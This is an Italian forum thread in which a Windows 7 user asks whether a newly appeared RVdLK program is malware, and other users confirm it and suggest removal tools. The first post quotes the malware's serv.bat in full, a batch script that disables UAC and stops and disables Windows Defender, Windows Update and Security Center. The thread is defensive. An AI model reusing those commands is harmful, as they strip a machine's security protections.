|
|
|
![]() |
|
Strumenti |
![]() |
#1 |
Senior Member
Iscritto dal: Oct 2001
|
Virus o troiano non rilevato: ditemi se non lo è questo
Buongiorno
appena successo che windows 7 mi chiede il permesso di eseguire un programma di nome RVdLK ![]() allora indago: scopro che mi trovo questa cartella: C:\Users\Rob\AppData\Roaming\RVdLK_virus con data di oggi, io non ricordo di aver installato sta roba e non so cosa sia il contenuto è: *********************************** Directory of C:\Users\Rob\AppData\Roaming\RVdLK 08/06/2013 19:00 <DIR> . 08/06/2013 19:00 <DIR> .. 08/06/2013 18:08 0 D1 08/06/2013 18:03 668.160 RVdLK.exe 08/06/2013 18:03 5.430 RVdLK.ico 08/06/2013 18:03 222 RVdLK.ini 08/06/2013 18:03 232 RVdLK.log 08/06/2013 18:08 824 serv.bat 7 File(s) 674.868 bytes 2 Dir(s) 14.864.527.360 bytes free *********************************** che non si capisce bene cosa sia riporto serv.bat che a quanto capisco disattiva sistemi di sicurezza di windows, firewall, antitroiano etc.. *********************************** reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableVirtualization /t REG_DWORD /d 0 /f reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v RPSessionInterval /t REG_DWORD /d 0 /f sc stop windefend sc stop msmpsvc sc stop wuauserv sc stop wscsvc ping localhost -w 1000 -n 3 > nul sc config windefend start= disabled sc config msmpsvc start= disabled sc config wuauserv start= disabled sc config wscsvc start= disabled sc config luafv start= disabled ping localhost -w 1000 -n 2 > nul reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v MSASCui /f reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Defender" /f *********************************** nel registro di configurazione ha inserito una chiave in ...\windows\CurrentVersion\Run a nome SD214 che lancia RVdLK.exe il mio antivirus Avira Free non lo classifica come virus spybot non ha trovato da lamentarsi non mi sono fidato, ho negato l'autorizzazione all'esecuzione ho 'sputtanato' la chiave di registro e la cartella appena apparsa per me sto coso non è niente di buono ![]() sarei felice di sentire qualche opinione Grazie
![]() |
#2 |
Bannato
Iscritto dal: Jan 2003
Città: Lucca
|
malware al 100%
|
![]() |
![]() |
![]() |
#3 |
Bannato
|
disabilita l'UAC (reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v EnableLUA /t REG_DWORD /d 0 /f) perchè evidentemente richiede privilegi maggiori di quelli standard, ecc.
Malware 100% indipendentemente dal responso di Avira.. |
![]() |
![]() |
![]() |
#4 |
Senior Member
|
C'è modo di sapere come ha fatto arrivare sul mio hd, come è stato lanciato, installato... qualche indizio insomma, non vorrei trovarmelo reinstallato con un altro nome
![]() |
#5 |
Bannato
|
giro rapido di hitmanpro/malwarebytes per scrupolo.
Sul sapere da dove è entrato, ci vorrebbe la sfera di cristallo. Solitamente è il browser: hai Java? OS? UAC (ovviamente) attivo (giusto?) e a su che livello? |
![]() |
![]() |
![]() |
#6 |
Senior Member
|
ho java e adesso faccio l'aggiornamento
UAC poi controllo e ti faccio sapere intanto mote grazie
![]() |
#7 |
Senior Member
|
os win7 ultimate 64bit
hitman pro mi trova tanti tracking cookie cosa che non mi preoccupa più di tanto e un paio di malaware uno dei due è heurlik simpaticamente avira lanciato sull'eseguibuile non si lamenta neanche (ma che caxxo) hitman dice anche che ho un proxy in locale questa si cosa brutta ma, pare che sia un falso allarme perchè cercando la sua porta 21320 con netstat -b -a scopro che è sdfssvc.exe che è un eseguibile nella cartella di spybot search&destroy ma che cavolo fanno queli di spybot search&destroy mi installano un cavolo di proxy che non mi fa più partire alcune applicazioni java e manco me lo dicono accidenti a loro? boh vale la pena tenerlo sto spybot? da un po' non lo tenevo più perché mi appesantiva troppo la macchina per il resto pare che il grosso della minaccia sia stato sventato tnx
![]() |
Strumenti | |
|
|
Tutti gli orari sono GMT +1. Ora sono le: 05:44.